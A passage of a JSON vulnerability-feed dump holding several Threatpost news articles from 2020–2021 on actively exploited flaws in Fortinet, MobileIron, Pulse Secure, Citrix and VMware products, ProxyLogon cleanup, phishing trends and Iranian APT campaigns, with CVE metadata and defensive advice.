continued blurring of the lines between nation-states, intelligence services and enterprise security,\u201d he added via email. \u201cWith a number of high-profile attacks affecting well-used enterprise software recently, the NSA are obviously keen to step up and play a proactive role.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. _**\n\n**_ _**\n", "cvss3": {}, "published": "2021-04-14T17:31:13", "type": "threatpost", "title": "FBI Clears ProxyLogon Web Shells from Hundreds of Orgs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-28480", "CVE-2021-28483"], "modified": "2021-04-14T17:31:13", "id": "THREATPOST:2FE0A6568321CDCF2823C6FA18106381", "href": "https://threatpost.com/fbi-proxylogon-web-shells/165400/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-18T20:47:20", "description": "UPDATE\n\nAn unpatched OS command-injection security vulnerability has been disclosed in Fortinet\u2019s web application firewall (WAF) platform, known as FortiWeb. It could allow privilege escalation and full device takeover, researchers said.\n\nFortiWeb is a cybersecurity defense platform, [aimed at](<https://www.fortinet.com/products/web-application-firewall/fortiweb>) protecting business-critical web applications from attacks that target known and unknown vulnerabilities. The firewall has been to keep up with the deployment of new or updated features, or the addition of new web APIs, according to Fortinet.\n\nThe bug (CVE pending) exists in FortiWeb\u2019s management interface (version 6.3.11 and prior), and carries a CVSSv3 base score of 8.7 out of 10, making it high-severity. It can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page, according to Rapid7 researcher William Vu who discovered the bug.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\n\u201cNote that while authentication is a prerequisite for this exploit, this vulnerability could be combined with another authentication-bypass issue, such as [CVE-2020-29015](<https://www.fortiguard.com/psirt/FG-IR-20-124>),\u201d according to a [Tuesday writeup](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>) on the issue.\n\nOnce attackers are authenticated to the management interface of the FortiWeb device, they can smuggle commands using backticks in the \u201cName\u201d field of the SAML Server configuration page. These commands are then executed as the root user of the underlying operating system.\n\n\u201cAn attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges,\u201d according to the writeup. \u201cThey might install a persistent shell, crypto mining software, or other malicious software.\u201d\n\nThe damage could be worse if the management interface is exposed to the internet: Rapid7 noted that attackers could pivot to the wider network in that case. However, Rapid7 researchers identified less than three hundred appliances that appeared to be doing so.\n\nIn the analysis, Vu provided a proof-of-concept exploit code, which uses an HTTP POST request and response.\n\nIn light of the disclosure, Fortinet has sped up plans to release a fix for the problem with FortiWeb 6.4.1 \u2014 originally planned for the end of August, it will now be available by the end of the week.\n\n\u201cWe are working to deliver immediate notification of a workaround to customers and a patch released by the end of the week,\u201d it said in a statement provided to Threatpost.\n\nThe firm also noted that Rapid7\u2019s disclosure was a bit of a surprise given [vulnerability-disclosure norms](<https://threatpost.com/giggle-managing-expectations-vulnerability-disclosure/159039/>) in the industry.\n\n\u201cThe security of our customers is always our first priority. Fortinet recognizes the important role of independent security researchers who work closely with vendors to protect the cybersecurity ecosystem in alignment with their responsible disclosure policies. In addition to directly communicating with researchers, our disclosure policy is clearly outlined on the [Fortinet PSIRT Policy page](<https://www.fortiguard.com/psirt_policy>), which includes asking incident submitters to maintain strict confidentiality until complete resolutions are available for customers. As such, we had expected that Rapid7 hold any findings prior to the end of the our [90-day Responsible disclosure window](<https://www.fortiguard.com/zeroday/responsible-disclosure>). We regret that in this instance, individual research was fully disclosed without adequate notification prior to the 90-day window.\u201d\n\nFor now, Rapid7 offered straightforward advice:\n\n\u201cIn the absence of a patch, users are advised to disable the FortiWeb device\u2019s management interface from untrusted networks, which would include the internet,\u201d according to Rapid7. \u201cGenerally speaking, management interfaces for devices like FortiWeb should not be exposed directly to the internet anyway \u2014 instead, they should be reachable only via trusted, internal networks, or over a secure VPN connection.\u201d\n\nThe Rapid7 researchers said that the vulnerability appears to be related to [CVE-2021-22123](<https://www.fortiguard.com/psirt/FG-IR-20-120>), which was patched in June.\n\n## **Fortinet: Popular for Exploit**\n\nThe vendor [is no stranger](<https://threatpost.com/fortigate-vpn-default-config-mitm-attacks/159586/>) to cybersecurity bugs in its platforms, and Fortinet\u2019s cybersecurity products are popular as exploitation avenues with cyberattackers, including nation-state actors. Users should prepare to patch quickly.\n\nIn April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) various advanced persistent threats (APTs) were actively exploiting three security vulnerabilities in the Fortinet SSL VPN for espionage. Exploits for CVE-2018-13379, CVE-2019-5591 and CVE-2020-12812 were being used for to gain a foothold within networks before moving laterally and carrying out recon, they warned.\n\nOne of those bugs, a Fortinet vulnerability in FortiOS, [was also seen](<https://threatpost.com/hackers-exploit-flaw-cring-ransomware/165300/>) being used to deliver a new ransomware strain, dubbed Cring, that is targeting industrial enterprises across Europe.\n\n_**This post was updated August 18 at 1:30 p.m. ET with a statement from Fortinet.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-18T12:07:33", "type": "threatpost", "title": "Unpatched Fortinet Bug Allows Firewall Takeovers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-29015", "CVE-2021-22123"], "modified": "2021-08-18T12:07:33", "id": "THREATPOST:BE0B5E93BD5FBBCB893FDDFE5348FDE9", "href": "https://threatpost.com/unpatched-fortinet-bug-firewall-takeovers/168764/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-04-16T18:13:10", "description": "The Feds are warning that nation-state actors are once again after U.S. assets, this time in a spate of cyberattacks that exploit five vulnerabilities that affect VPN solutions, collaboration-suite software and virtualization technologies.\n\nAccording to the U.S. National Security Agency (NSA), which issued [an alert Thursday,](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/%20/#pop5008885>) the advanced persistent threat (APT) group [known as APT29](<https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/>) (a.k.a. Cozy Bear or The Dukes) is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access.\u201d\n\nThe targets include U.S. and allied national-security and government networks, it added.\n\n[](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)\n\nJoin experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) to find out how cybercrime forums really work. FREE! Register by clicking above.\n\nThe five bugs under active attack are known, fixed security holes in platforms from Citrix, Fortinet, Pulse Secure, Synacor and VMware (detailed below) that organizations should patch immediately, researchers warned.\n\n\u201cSome of these vulnerabilities also have working Metasploit modules and are currently being widely exploited,\u201d said researchers with Cisco Talos, in a [related posting](<https://blog.talosintelligence.com/2021/04/nsa-svr-coverage.html#more>) on Thursday. \u201cPlease note that some of these vulnerabilities exploit applications leveraging SSL. This means that users should enable SSL decryption\u2026to detect exploitation of these vulnerabilities.\u201d\n\nThe NSA has linked APT29 to Russia\u2019s Foreign Intelligence Services (SVR). The news comes as the U.S. formally attributed the recent [SolarWinds supply-chain attack](<https://threatpost.com/solarwinds-orion-bug-remote-code-execution/163618/>) to the SVR and issued sanctions on Russia for cyberattacks and what President Biden called out as interference with U.S. elections.\n\n## **The 5 Vulnerabilities Being Actively Exploited**\n\nAccording to the NSA, the following are under widespread attack in cyber-espionage efforts:\n\n * CVE-2018-13379 Fortinet FortiGate SSL VPN (path traversal)\n * CVE-2019-9670 Synacor Zimbra Collaboration Suite (XXE)\n * CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN (arbitrary file read)\n * CVE-2019-19781 Citrix Application Delivery Controller and Gateway (directory traversal)\n * CVE-2020-4006 VMware Workspace ONE Access (command injection)\n\n\u201cVulnerabilities in two VPN systems, two virtualization platforms and one collaboration solution seem to be a mighty combo,\u201d Dirk Schrader, global vice president of security research at New Net Technologies, told Threatpost. \u201cFour of them are 12 months or older, which is not a good sign for the overall cyber-hygiene in the U.S., given that all are either rated as severe or even critical in NIST\u2019s NVD. It looks like that adversaries can rely on the lack of diligence related to essential cybersecurity control, even more so in pandemic times.\u201d\n\n## **CVE-2018-13379**\n\nA directory traversal vulnerability in Fortinet FortOS allows unauthenticated attackers to access and download system files, by sending specially crafted HTTP resource requests. \u201cThis can result in the attacker obtaining VPN credentials, which could allow an initial foothold into a target network,\u201d according to Cisco Talos.\n\nThe NSA explained that it arises from an improper limitation of a pathname to a restricted directory. It affects Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12.\n\nThe nation-state issue is ongoing: Earlier in April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) APTs were actively exploiting the bug.\n\n## **CVE-2019-9670**\n\nThis bug is an XML External Entity Injection (XXE) vulnerability in the mailbox component of the Synacore Zimbra Collaboration Suite. Attackers can exploit it to gain access to credentials to further their access or as an initial foothold into a target network. It affects Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10.\n\n## **CVE-2019-11510**\n\nIn Pulse Secure VPNs, a critical arbitrary file-reading flaw opens systems to exploitation from remote, unauthenticated attackers looking to gain access to a victim\u2019s networks. Attacker can send a specially crafted URI to trigger the exploit. It affects Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4.\n\n\u201cThis can be abused by attackers to access sensitive information, including private keys and credentials,\u201d explained Cisco Talos researchers.\n\nLast April, the Department of Homeland Security (DHS) began urging companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, after several cyberattacks targeted companies who had previously patched a related flaw in the VPN family.\n\nAt the time, DHS [warned that attackers](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) who have already exploited the flaw to snatch up victims\u2019 credentials were using those credentials to move laterally through organizations, rendering patches useless.\n\nThen September, a successful cyberattack on an unnamed federal agency [was attributed to](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>) exploitation of the bug. \u201cIt is possible the cyber-actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability \u2013 CVE-2019-11510 \u2013 in Pulse Secure,\u201d according to CISA\u2019s alert at the time. \u201cCVE-2019-11510\u2026allows the remote, unauthenticated retrieval of files, including passwords. CISA has observed wide exploitation of CVE-2019-11510 across the federal government.\u201d\n\n## **CVE-2019-19781**\n\nThis critical directory-traversal vulnerability in the Citrix Application Delivery Controller (ADC) and Gateway that can allow remote code-execution. It was first disclosed as a zero-day in December 2019, after which Citrix [rolled out patches](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) amidst dozens of proof-of-concept exploits and skyrocketing exploitation attempts.\n\nIt affects Citrix ADC and Gateway versions before 13.0.47.24, 12.1.55.18, 12.0.63.13, 11.1.63.15 and 10.5.70.12 and SD-WAN WANOP 4000-WO, 4100-WO, 5000-WO, and 5100-WO versions before 10.2.6b and 11.0.3b.\n\n## **C****VE-2020-4006**\n\nAnd finally, a command-injection vulnerability in VMWare Workspace One Access, Access Connector, Identity Manager and Identity Manager Connector allows arbitrary command execution on underlying operating systems. A successful exploit does, however, require valid credentials to the configurator admin account, so it must be chained with another bug to use it.\n\nNonetheless, in December the NSA [warned that](<https://threatpost.com/nsa-vmware-bug-under-attack/161985/>) foreign adversaries were zeroing in on exploiting the flaw, despite patches rolling out just days earlier. State actors were using the bug to pilfer protected data and abuse shared authentication systems, it said.\n\nIt affects VMware One Access 20.01 and 20.10 on Linux, VMware Identity Manager 3.3.1 \u2013 3.3.3 on Linux, VMware Identity Manager Connector 3.3.1 \u2013 3.3.3 and 19.03, VMware Cloud Foundation 4.0 \u2013 4.1, and VMware Vrealize Suite Lifecycle Manager 8.x.\n\n## **How Can I Protect Against Cyberattacks?**\n\nThe NSA recommended several best practices to protect organizations from attack:\n\n * Update systems and products as soon as possible after patches are released.\n * Assume a breach will happen; review accounts and leverage the latest eviction guidance available.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in client device configurations.\n * Adopt a mindset that compromise happens: Prepare for incident response activities.\n\n\u201cIf publicly known, patchable exploits still have gas in the tank, this is just an indictment against the status-quo disconnect between many organizations\u2019 understanding of risk and basic IT hygiene,\u201d Tim Wade, technical director on the CTO team at Vectra, told Threatpost. \u201cThe unfortunate reality is that for many organizations, the barrier to entry into their network continues to be low-hanging fruit which, for one reason or another, is difficult for organizations to fully manage.\u201d\n\nHe added, \u201cThis underscores why security leaders should assume that for all the best intentions of their technology peers, compromises will occur \u2013 their imperative is to detect, respond and recover from those events to expel adversaries before material damage is realized.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-16T18:10:09", "type": "threatpost", "title": "NSA: 5 Security Bugs Under Active Nation-State Cyberattack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-16T18:10:09", "id": "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "href": "https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-05-05T14:08:09", "description": "Innovative twists on [banking scams and corporate-account hunters](<https://securelist.com/spam-and-phishing-in-q1-2021/102018/>) wielding increasingly clever lures, including those with COVID-19 vaccine promises, are likely to dominate the spam and phishing landscape throughout Q2 2021, according to researchers.\n\nAnd although no new wild trends have emerged, Kaspersky researchers, who just released their report for Q1 2021, said that the [spear-phishing tactics](<https://threatpost.com/linkedin-spear-phishing-job-hunters/165240/>) attackers are using against victims are getting better.\n\n## **Bank-Scam, QR-Code Phishing Lures **\n\nFor instance, mobile banking scams aren\u2019t anything new, however, attackers have developed a couple of new approaches.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nIn one example from Q1 2020, Kasperky reported that clients of several Dutch banks received a fraud email which prompted them to [scan a QR code](<https://threatpost.com/qr-codes-cyberattack-usage-spikes/165526/>) to \u201cunlock\u201d mobile banking. Instead, they were directed to a web page loaded with malware.\n\n[QR codes](<https://threatpost.com/anti-vaxxer-hijacks-qr-codes-covid19/165701/>) are an increasingly popular tool for threat actors, especially since the pandemic. They have been used to access menus, check in for vaccines and get public information.\n\nAnother banking scam observed by Kaspersky researchers delivered a fake newsletter posing as legitimate correspondence from MKB bank with updates on COVID-19, but instead delivered a scam Outlook sign-in page, attempting to harvest credentials.\n\nOther [phishing lures](<https://threatpost.com/buer-malware-loader-rewritten-rust/165782/>) observed last quarter by Kaspersky included offers of government payouts, intended to steal credit-card information and personal data.\n\n## **COVID-19 Vaccine Lures **\n\nCOVID-19 vaccines are the most important topic around the world at the moment, and malicious actors have capitalized on this over past several weeks.\n\n\n\nA scam COVID-19 vaccination lure. Source: Kaspersky. Click to enlarge.\n\n\u201cCybercriminals took advantage of people\u2019s desire to get vaccinated as quickly as possible,\u201d according to the report. \u201cFor instance, some U.K. residents received an email that appeared to come from the country\u2019s National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link.\u201d\n\nAnother particularly despicable [COVID scam email](<https://threatpost.com/mcafee-covid-rpowershell-malware-surge/165382/>) specifically targeted people over 65 seeking a vaccine, the researchers added.\n\n\u201cIn both cases, to make a vaccination appointment, a form had to be filled out with personal data; and in the first case, the phishers also wanted bank-card details,\u201d the report explained. \u201cIf the victim followed all the instructions on the fake website, they handed their money and personal data to the attackers.\u201d\n\nFraudsters also blasted out [scam vaccination](<https://threatpost.com/europol-covid-19-vaccine-rollout-fraud-theft/161968/>) surveys, which were emails doctored up to look like they were from pharmaceutical companies making vaccines, asking for input.\n\n\u201cParticipants were promised a gift or cash reward for their help,\u201d the report added. \u201cAfter answering the questions, the victim was redirected to a page with the \u2018gift.'\u201d\n\nThe victim was then asked for personal information, or in some cases, even payment information to pay for delivery of the \u201cprize.\u201d\n\nScammers also sent emails convincingly disguised to look like they were sent from Chinese vaccine-makers.\n\n## **Hunt for Corporate Credentials Is On **\n\n\n\nA bogus mobile QR-code lure. Source: Kaspersky. Click to enlarge.\n\nBecause consumers are getting better at spotting scams, attackers are getting expert at making their communications seem real. This is especially important in trying to score what Kaspersky calls \u201ca coveted prize for scammers:\u201d [corporate usernames and passwords](<https://threatpost.com/sharepoint-phish-ransomware-attacks/165671/>).\n\n\u201cTo counter people\u2019s increasingly wary attitude to emails from outside, attackers try to give their mailings a respectable look, disguising them as messages from business tools and services,\u201d Kaspersky said. \u201cBy blending into the workflow, the scammers calculate that the user will be persuaded to follow the link and enter data on a fake page.\u201d\n\nThe team observed a malicious link being delivered through Microsoft Planner, and in Russia, they discovered an email posing as a message from an analytics portal support team. Both asked for corporate-account credentials.\n\n\u201cOld techniques, such as creating a unique fake page using JavaScript, were combined in Q1 with overtly business-themed phishing emails,\u201d the report said. \u201cIf previously scammers used common, but not always business-oriented, services as bait, the new batch of emails cited an urgent document awaiting approval or contract in need of review.\u201d\n\n## **The \u2018Less is More\u2019 Lure **\n\nAnother interesting lure type highlighted by the Kaspersky report asks for just a tiny amount of money to complete the scam transaction. In one example the team gives, the criminals only asked for 1.99 Rubles ($.27).\n\n\u201cThe calculation was simple: Users would be less averse to paying a small amount than a larger one, which means more potential victims willing to enter card details on the bogus site,\u201d the report explained. The emails usually had themes around everyday services like deliveries, fake \u201cinvoices\u201d for domain usage or a WhatsApp subscription.\n\nFacebook users were targeted last quarter by a scam lure saying their accounts were in violation of the platform\u2019s terms of use, Kaspersky said. The first link went to a legitimate Facebook page to reassure the victim that it was real. But the second link went to a phishing site.\n\n\u201cThe attackers\u2019 calculation was simple: First lull the victim\u2019s vigilance with a legitimate link, then get them to enter their credentials on a fake page,\u201d the report explained.\n\nOverall, spam traffic was down a bit (by 2.1 percent) in Q1. The Russian-language internet (\u201cRunet\u201d) also saw a small drop in spam of less than 2 percent, the report added. Russia accounted for the largest percent of outgoing spam with 22.47 percent, followed by Germany with 14.89 percent, Kaspersky found. The U.S. and China meanwhile followed with 12.98 percent and 7.38 percent of the world\u2019s spam traffic.\n\nMalicious email attachments detected were also down, but Kaspersky points out that this is primarily due to a boost in the number of attachments blocked by mail antivirus.\n\n## **Malware Families on the Rise **\n\nThe most common malicious attachments for spam emails in the quarter consisted of the Agensla malware, according to Kaspersky, with 8.91 percent of malicious trojan market; followed by Microsoft Equation Editor vulnerability exploits for CVE-2017-11882. The Badun family was third with 5.79 percent.\n\n\u201cThe Top 10 most common malicious attachments in Q4 corresponds exactly to the ranking of families,\u201d the report explained. \u201cThis suggests that each of the above-described families was widespread largely due to one member.\u201d\n\nOnline stores remain the most popular impersonation targets for phishing pages, the report added, accounting for 15.77 percent of those observed, Kaspersky said. Global internet portals (15.5 percent) and banks (10.04 percent) were close behind.\n\nFinally, Kaspersky warns about a potential slight uptick in tourism-related bait around the corner.\n\n\u201cAnd as the summer season approaches, an increase in the number of emails related to tourism is possible; however, due to the pandemic, it is likely to be small,\u201d the report said. \u201cOn the other hand, cybercriminals will almost certainly continue to actively hunt corporate-account credentials, exploiting the fact that many companies are still in remote-working mode and communication among employees is predominantly online.\u201d\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **\n", "cvss3": {}, "published": "2021-05-04T13:46:19", "type": "threatpost", "title": "Phishers Delivering Increasingly Convincing Lures", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2021-22893"], "modified": "2021-05-04T13:46:19", "id": "THREATPOST:55873F60362AA114632D0D7DC95FF63C", "href": "https://threatpost.com/bait-phishers-convincing-lures/165834/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-26T03:52:19", "description": "Advanced persistent threat (APT) groups are actively exploiting a vulnerability in mobile device management security solutions from MobileIron, a new advisory warns.\n\nThe issue in question (CVE-2020-15505) is a remote code-execution flaw. It ranks 9.8 out of 10 on the CVSS severity scale, making it critical. The flaw was patched back in June, however, a proof of concept (PoC) [exploit became available](<https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2020-15505>) in September. Since then, both hostile state actors and cybercriminals have attempted to exploit the flaw in the U.K., according to a new advisory by the National Cyber Security Centre (NCSC).\n\n\u201cThese actors typically scan victim networks to identify vulnerabilities, including CVE-2020-15505, to be used during targeting,\u201d said the NCSC [in an advisory this week](<https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability>). \u201cIn some cases, when the latest updates are not installed, they have successfully compromised systems.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe NCSC said that the healthcare, local government, logistics and legal sectors have all been targeted \u2013 but others could also be affected.\n\nSeparately, the Cybersecurity and Infrastructure Security Agency (CISA) [in October warned that](<https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/>) APT groups are exploiting the MobileIron flaw in combination with the severe Microsoft Windows [Netlogon/Zerologon vulnerability](<https://threatpost.com/microsoft-warns-zerologon-bug/160769/>) (CVE-2020-1472).\n\n## **The Flaw**\n\nThe flaw, first reported to MobileIron by Orange Tsai from DEVCORE, could allow an attacker to execute remote exploits without authentication.\n\nMobileIron provides a platform that allows enterprises to manage the end-user mobile devices across their company. The flaw exists across various components of this platform: In MobileIron Core, a component of the MobileIron platform that serves as the administrative console; and in MobileIron Connector, a component that adds real-time connectivity to the backend. Also impacted is Sentry, an in-line gateway that manages, encrypts and secures traffic between the mobile-device and back-end enterprise systems; and Monitor and Reporting Database, which provides comprehensive performance management functionality.\n\nThe bug affects Core and Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier that allows remote attackers to execute arbitrary code via unspecified vectors.\n\n## **Patches**\n\nMobileIron, for its part, said in an update this week that it has been engaging in \u201cproactive outreach to help customers secure their systems,\u201d and estimates that 90 to 95 percent of all devices are now managed on patched/updated versions of software.\n\nWhile the company said it will continue to follow up with the remaining customers where we can determine that they have not yet patched affected products, it strongly urges companies to make sure they are updated.\n\n\u201cMobileIron strongly recommends that customers apply these patches and any security updates as soon as possible,\u201d said the company in its [security update.](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)\n\nThreatpost has reached out to MobileIron for further comment.\n\n**_Put Ransomware on the Run: Save your spot for \u201cWhat\u2019s Next for Ransomware,\u201d a _****_[FREE Threatpost webinar](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)_****_ on _****_Dec. 16 at 2 p.m. ET. _****_Find out what\u2019s coming in the ransomware world and how to fight back. _**\n\n**_Get the latest from world-class security experts on new kinds of attacks, the most dangerous ransomware threat actors, their evolving TTPs and what your organization needs to do to get ahead of the next, inevitable ransomware attack. _****_[Register here](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)_****_ for the Wed., Dec. 16 for this _****_LIVE webinar_****_._**\n", "cvss3": {}, "published": "2020-11-25T16:55:48", "type": "threatpost", "title": "Critical MobileIron RCE Flaw Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472", "CVE-2020-15505"], "modified": "2020-11-25T16:55:48", "id": "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "href": "https://threatpost.com/critical-mobileiron-rce-flaw-attack/161600/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-18T02:26:11", "description": "A state-backed Iranian threat actor has been using multiple CVEs \u2013 including both serious Fortinet vulnerabilities for months and a Microsoft Exchange ProxyShell weakness for weeks \u2013 looking to gain a foothold within networks before moving laterally and launching [BitLocker](<https://threatpost.com/hades-ransomware-connections-hafnium/165069/>) ransomware and other nastiness.\n\nA joint [advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) published by CISA on Wednesday was meant to highlight the ongoing, malicious cyber assault, which has been tracked by the FBI, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC) and the United Kingdom\u2019s National Cyber Security Centre (NCSC). All of the security bodies have traced the attacks to an Iranian government-sponsored advanced persistent threat (APT).\n\nThe Iranian APT has been exploiting Fortinet vulnerabilities since at least March 2021 and a Microsoft Exchange ProxyShell vulnerability since at least October 2021, according to the alert. The weaknesses are granting the attackers initial access to systems that\u2019s then leading to follow-on operations including ransomware, data exfiltration or encryption, and extortion.\n\nThe APT has used the same Microsoft Exchange vulnerability in Australia.\n\n## CISA Warning Follows Microsoft Report on Six Iranian Threat Groups\n\nCISA\u2019s warning came on the heels of [an analysis](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) of the evolution of Iranian threat actors released by Microsoft\u2019s Threat Intelligence Center (MSTIC) on Tuesday.\n\nMSTIC researchers called out three trends they\u2019ve seen emerge since they started tracking six increasingly sophisticated Iranian APT groups in September 2020:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\nThey\u2019ve seen ransomware attacks coming in waves, averaging every six to eight weeks, as shown in the timeline 